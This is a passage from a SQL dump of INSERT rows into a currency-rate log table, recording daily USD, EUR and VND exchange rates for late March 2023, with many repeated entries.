(1386, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1387, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1388, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1389, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1390, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1391, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1392, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1393, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1394, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1395, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1396, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1397, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1398, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1399, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-03-24'),
(1400, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1401, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-03-24'),
(1402, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1403, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1404, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1405, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1406, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1407, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1408, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1409, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1410, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1411, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1412, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1413, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1414, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1415, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1416, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1417, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1418, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1419, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1420, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1421, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1422, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1423, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1424, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1425, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1426, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1427, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1428, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1429, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1430, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1431, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1432, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1433, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1434, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1435, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1436, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1437, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1438, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1439, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1440, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1441, 1, 'USD', 0.000000, 2, 'EUR', 0.919200, '2023-03-24'),
(1442, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1443, 2, 'EUR', 0.000000, 1, 'USD', 1.087900, '2023-03-24'),
(1444, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-24'),
(1445, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-24'),
(1446, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-24'),
(1447, 1, 'USD', 1.000000, 2, 'EUR', 0.919200, '2023-03-25'),
(1448, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1449, 2, 'EUR', 1.000000, 1, 'USD', 1.087900, '2023-03-25'),
(1450, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1451, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1452, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1453, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1454, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1455, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1456, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1457, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1458, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1459, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1460, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1461, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1462, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1463, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1464, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1465, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1466, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1467, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1468, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1469, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1470, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1471, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1472, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1473, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1474, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1475, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1476, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1477, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1478, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1479, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1480, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1481, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1482, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1483, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1484, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1485, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1486, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1487, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1488, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1489, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-25'),
(1490, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1491, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-25'),
(1492, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-25'),
(1493, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-25'),
(1494, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-25'),
(1495, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1496, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1497, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1498, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1499, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1500, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1501, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1502, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1503, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1504, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1505, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1506, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1507, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1508, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1509, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1510, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1511, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1512, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1513, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1514, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1515, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1516, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1517, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1518, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1519, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1520, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1521, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1522, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1523, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1524, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1525, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1526, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1527, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1528, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1529, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1530, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1531, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1532, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1533, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1534, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1535, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1536, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1537, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-26'),
(1538, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1539, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-26'),
(1540, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-26'),
(1541, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-26'),
(1542, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-26'),
(1543, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1544, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1545, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1546, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1547, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1548, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1549, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1550, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1551, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1552, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1553, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1554, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1555, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1556, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1557, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1558, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1559, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1560, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1561, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1562, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1563, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1564, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1565, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1566, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1567, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1568, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1569, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1570, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1571, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1572, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1573, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1574, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1575, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1576, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1577, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1578, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1579, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1580, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1581, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1582, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1583, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1584, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1585, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-03-27'),
(1586, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1587, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-03-27'),
(1588, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-27'),
(1589, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-27'),
(1590, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-27'),
(1591, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-03-28'),
(1592, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1593, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-03-28'),
(1594, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1595, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1596, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1597, 1, 'USD', 0.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1598, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1599, 2, 'EUR', 0.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1600, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1601, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1602, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1603, 1, 'USD', 1.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1604, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1605, 2, 'EUR', 1.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1606, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1607, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1608, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1609, 1, 'USD', 0.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1610, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1611, 2, 'EUR', 0.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1612, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1613, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1614, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1615, 1, 'USD', 1.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1616, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1617, 2, 'EUR', 1.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1618, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1619, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1620, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1621, 1, 'USD', 0.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1622, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1623, 2, 'EUR', 0.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1624, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1625, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1626, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1627, 1, 'USD', 1.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1628, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1629, 2, 'EUR', 1.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1630, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1631, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1632, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1633, 1, 'USD', 0.000000, 2, 'EUR', 0.928250, '2023-03-28'),
(1634, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1635, 2, 'EUR', 0.000000, 1, 'USD', 1.077300, '2023-03-28'),
(1636, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-28'),
(1637, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-28'),
(1638, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-28'),
(1639, 1, 'USD', 1.000000, 2, 'EUR', 0.928250, '2023-03-29'),
(1640, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1641, 2, 'EUR', 1.000000, 1, 'USD', 1.077300, '2023-03-29'),
(1642, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1643, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1644, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1645, 1, 'USD', 0.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1646, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1647, 2, 'EUR', 0.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1648, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1649, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1650, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1651, 1, 'USD', 1.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1652, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1653, 2, 'EUR', 1.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1654, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1655, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1656, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1657, 1, 'USD', 0.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1658, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1659, 2, 'EUR', 0.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1660, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1661, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1662, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1663, 1, 'USD', 1.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1664, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1665, 2, 'EUR', 1.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1666, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1667, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1668, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1669, 1, 'USD', 0.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1670, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1671, 2, 'EUR', 0.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1672, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1673, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1674, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1675, 1, 'USD', 1.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1676, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1677, 2, 'EUR', 1.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1678, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-29');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(1679, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1680, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1681, 1, 'USD', 0.000000, 2, 'EUR', 0.922420, '2023-03-29'),
(1682, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1683, 2, 'EUR', 0.000000, 1, 'USD', 1.084100, '2023-03-29'),
(1684, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-29'),
(1685, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-29'),
(1686, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-29'),
(1687, 1, 'USD', 1.000000, 2, 'EUR', 0.922420, '2023-03-30'),
(1688, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1689, 2, 'EUR', 1.000000, 1, 'USD', 1.084100, '2023-03-30'),
(1690, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1691, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1692, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1693, 1, 'USD', 0.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1694, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1695, 2, 'EUR', 0.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1696, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1697, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1698, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1699, 1, 'USD', 1.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1700, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1701, 2, 'EUR', 1.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1702, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1703, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1704, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1705, 1, 'USD', 0.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1706, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1707, 2, 'EUR', 0.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1708, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1709, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1710, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1711, 1, 'USD', 1.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1712, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1713, 2, 'EUR', 1.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1714, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1715, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1716, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1717, 1, 'USD', 0.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1718, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1719, 2, 'EUR', 0.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1720, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1721, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1722, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1723, 1, 'USD', 1.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1724, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1725, 2, 'EUR', 1.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1726, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1727, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1728, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-30'),
(1729, 1, 'USD', 0.000000, 2, 'EUR', 0.921910, '2023-03-30'),
(1730, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1731, 2, 'EUR', 0.000000, 1, 'USD', 1.084700, '2023-03-30'),
(1732, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-30'),
(1733, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-30'),
(1734, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-30'),
